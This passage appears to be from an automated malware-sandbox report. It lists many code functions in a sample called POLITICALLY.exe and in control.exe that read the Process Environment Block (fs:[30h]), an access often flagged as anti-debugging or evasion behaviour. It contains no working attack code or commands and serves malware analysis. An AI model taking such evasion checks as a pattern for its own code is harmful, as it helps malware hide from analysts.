Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2E8DF1 mov eax, dword ptr fs:[00000030h] 10_2_1E2E8DF1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov ecx, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E274A2C mov eax, dword ptr fs:[00000030h] 10_2_1E274A2C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E274A2C mov eax, dword ptr fs:[00000030h] 10_2_1E274A2C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E248A0A mov eax, dword ptr fs:[00000030h] 10_2_1E248A0A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h] 10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E235210 mov ecx, dword ptr fs:[00000030h] 10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h] 10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h] 10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23AA16 mov eax, dword ptr fs:[00000030h] 10_2_1E23AA16
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23AA16 mov eax, dword ptr fs:[00000030h] 10_2_1E23AA16
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E253A1C mov eax, dword ptr fs:[00000030h] 10_2_1E253A1C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FAA16 mov eax, dword ptr fs:[00000030h] 10_2_1E2FAA16
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FAA16 mov eax, dword ptr fs:[00000030h] 10_2_1E2FAA16
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2EB260 mov eax, dword ptr fs:[00000030h] 10_2_1E2EB260
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2EB260 mov eax, dword ptr fs:[00000030h] 10_2_1E2EB260
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308A62 mov eax, dword ptr fs:[00000030h] 10_2_1E308A62
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27927A mov eax, dword ptr fs:[00000030h] 10_2_1E27927A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h] 10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h] 10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h] 10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h] 10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FEA55 mov eax, dword ptr fs:[00000030h] 10_2_1E2FEA55
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2C4257 mov eax, dword ptr fs:[00000030h] 10_2_1E2C4257
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24AAB0 mov eax, dword ptr fs:[00000030h] 10_2_1E24AAB0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24AAB0 mov eax, dword ptr fs:[00000030h] 10_2_1E24AAB0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26FAB0 mov eax, dword ptr fs:[00000030h] 10_2_1E26FAB0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26D294 mov eax, dword ptr fs:[00000030h] 10_2_1E26D294
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26D294 mov eax, dword ptr fs:[00000030h] 10_2_1E26D294
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262AE4 mov eax, dword ptr fs:[00000030h] 10_2_1E262AE4
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262ACB mov eax, dword ptr fs:[00000030h] 10_2_1E262ACB
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F131B mov eax, dword ptr fs:[00000030h] 10_2_1E2F131B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23DB60 mov ecx, dword ptr fs:[00000030h] 10_2_1E23DB60
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E263B7A mov eax, dword ptr fs:[00000030h] 10_2_1E263B7A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E263B7A mov eax, dword ptr fs:[00000030h] 10_2_1E263B7A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23DB40 mov eax, dword ptr fs:[00000030h] 10_2_1E23DB40
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308B58 mov eax, dword ptr fs:[00000030h] 10_2_1E308B58
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23F358 mov eax, dword ptr fs:[00000030h] 10_2_1E23F358
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h] 10_2_1E264BAD
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h] 10_2_1E264BAD
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h] 10_2_1E264BAD
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E305BA5 mov eax, dword ptr fs:[00000030h] 10_2_1E305BA5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F138A mov eax, dword ptr fs:[00000030h] 10_2_1E2F138A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E241B8F mov eax, dword ptr fs:[00000030h] 10_2_1E241B8F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E241B8F mov eax, dword ptr fs:[00000030h] 10_2_1E241B8F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2ED380 mov ecx, dword ptr fs:[00000030h] 10_2_1E2ED380
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262397 mov eax, dword ptr fs:[00000030h] 10_2_1E262397
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26B390 mov eax, dword ptr fs:[00000030h] 10_2_1E26B390
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h] 10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h] 10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h] 10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h] 10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h] 10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h] 10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25DBE9 mov eax, dword ptr fs:[00000030h] 10_2_1E25DBE9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B53CA mov eax, dword ptr fs:[00000030h] 10_2_1E2B53CA
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B53CA mov eax, dword ptr fs:[00000030h] 10_2_1E2B53CA
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h] 10_2_1E26002D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h] 10_2_1E26002D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h] 10_2_1E26002D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h] 10_2_1E26002D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h] 10_2_1E26002D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h] 10_2_1E24B02A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h] 10_2_1E24B02A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h] 10_2_1E24B02A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h] 10_2_1E24B02A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E304015 mov eax, dword ptr fs:[00000030h] 10_2_1E304015
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E304015 mov eax, dword ptr fs:[00000030h] 10_2_1E304015
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h] 10_2_1E2B7016
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h] 10_2_1E2B7016
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h] 10_2_1E2B7016
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E301074 mov eax, dword ptr fs:[00000030h] 10_2_1E301074
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F2073 mov eax, dword ptr fs:[00000030h] 10_2_1E2F2073
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E250050 mov eax, dword ptr fs:[00000030h] 10_2_1E250050
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E250050 mov eax, dword ptr fs:[00000030h] 10_2_1E250050
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h] 10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h] 10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h] 10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h] 10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h] 10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h] 10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2790AF mov eax, dword ptr fs:[00000030h] 10_2_1E2790AF
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26F0BF mov ecx, dword ptr fs:[00000030h] 10_2_1E26F0BF
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26F0BF mov eax, dword ptr fs:[00000030h] 10_2_1E26F0BF
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26F0BF mov eax, dword ptr fs:[00000030h] 10_2_1E26F0BF
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239080 mov eax, dword ptr fs:[00000030h] 10_2_1E239080
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B3884 mov eax, dword ptr fs:[00000030h] 10_2_1E2B3884
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B3884 mov eax, dword ptr fs:[00000030h] 10_2_1E2B3884
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h] 10_2_1E2340E1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h] 10_2_1E2340E1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h] 10_2_1E2340E1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2358EC mov eax, dword ptr fs:[00000030h] 10_2_1E2358EC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov ecx, dword ptr fs:[00000030h] 10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h] 10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h] 10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h] 10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h] 10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 mov ecx, dword ptr fs:[00000030h] 10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26513A mov eax, dword ptr fs:[00000030h] 10_2_1E26513A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26513A mov eax, dword ptr fs:[00000030h] 10_2_1E26513A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h] 10_2_1E239100
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h] 10_2_1E239100
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h] 10_2_1E239100
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23C962 mov eax, dword ptr fs:[00000030h] 10_2_1E23C962
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23B171 mov eax, dword ptr fs:[00000030h] 10_2_1E23B171
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23B171 mov eax, dword ptr fs:[00000030h] 10_2_1E23B171
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25B944 mov eax, dword ptr fs:[00000030h] 10_2_1E25B944
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25B944 mov eax, dword ptr fs:[00000030h] 10_2_1E25B944
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2661A0 mov eax, dword ptr fs:[00000030h] 10_2_1E2661A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2661A0 mov eax, dword ptr fs:[00000030h] 10_2_1E2661A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h] 10_2_1E2F49A4
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h] 10_2_1E2F49A4
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h] 10_2_1E2F49A4
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h] 10_2_1E2F49A4
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B69A6 mov eax, dword ptr fs:[00000030h] 10_2_1E2B69A6
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h] 10_2_1E2B51BE
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h] 10_2_1E2B51BE
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h] 10_2_1E2B51BE
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h] 10_2_1E2B51BE
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A185 mov eax, dword ptr fs:[00000030h] 10_2_1E26A185
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25C182 mov eax, dword ptr fs:[00000030h] 10_2_1E25C182
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262990 mov eax, dword ptr fs:[00000030h] 10_2_1E262990
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h] 10_2_1E23B1E1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h] 10_2_1E23B1E1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h] 10_2_1E23B1E1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2C41E8 mov eax, dword ptr fs:[00000030h] 10_2_1E2C41E8
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483849B mov eax, dword ptr fs:[00000030h] 23_2_0483849B
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F8CD6 mov eax, dword ptr fs:[00000030h] 23_2_048F8CD6
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E14FB mov eax, dword ptr fs:[00000030h] 23_2_048E14FB
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h] 23_2_048A6CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h] 23_2_048A6CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h] 23_2_048A6CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h] 23_2_048A6C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h] 23_2_048A6C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h] 23_2_048A6C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h] 23_2_048A6C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F740D mov eax, dword ptr fs:[00000030h] 23_2_048F740D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F740D mov eax, dword ptr fs:[00000030h] 23_2_048F740D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F740D mov eax, dword ptr fs:[00000030h] 23_2_048F740D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h] 23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485BC2C mov eax, dword ptr fs:[00000030h] 23_2_0485BC2C
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A44B mov eax, dword ptr fs:[00000030h] 23_2_0485A44B
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BC450 mov eax, dword ptr fs:[00000030h] 23_2_048BC450
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BC450 mov eax, dword ptr fs:[00000030h] 23_2_048BC450
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484746D mov eax, dword ptr fs:[00000030h] 23_2_0484746D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h] 23_2_04852581
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h] 23_2_04852581
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h] 23_2_04852581
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h] 23_2_04852581
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h] 23_2_04822D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h] 23_2_04822D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h] 23_2_04822D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h] 23_2_04822D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h] 23_2_04822D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485FD9B mov eax, dword ptr fs:[00000030h] 23_2_0485FD9B
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485FD9B mov eax, dword ptr fs:[00000030h] 23_2_0485FD9B
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F05AC mov eax, dword ptr fs:[00000030h] 23_2_048F05AC
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F05AC mov eax, dword ptr fs:[00000030h] 23_2_048F05AC
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048535A1 mov eax, dword ptr fs:[00000030h] 23_2_048535A1
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h] 23_2_04851DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h] 23_2_04851DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h] 23_2_04851DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov ecx, dword ptr fs:[00000030h] 23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h] 23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483D5E0 mov eax, dword ptr fs:[00000030h] 23_2_0483D5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483D5E0 mov eax, dword ptr fs:[00000030h] 23_2_0483D5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 23_2_048EFDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 23_2_048EFDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 23_2_048EFDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h] 23_2_048EFDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048D8DF1 mov eax, dword ptr fs:[00000030h] 23_2_048D8DF1
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482AD30 mov eax, dword ptr fs:[00000030h] 23_2_0482AD30
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
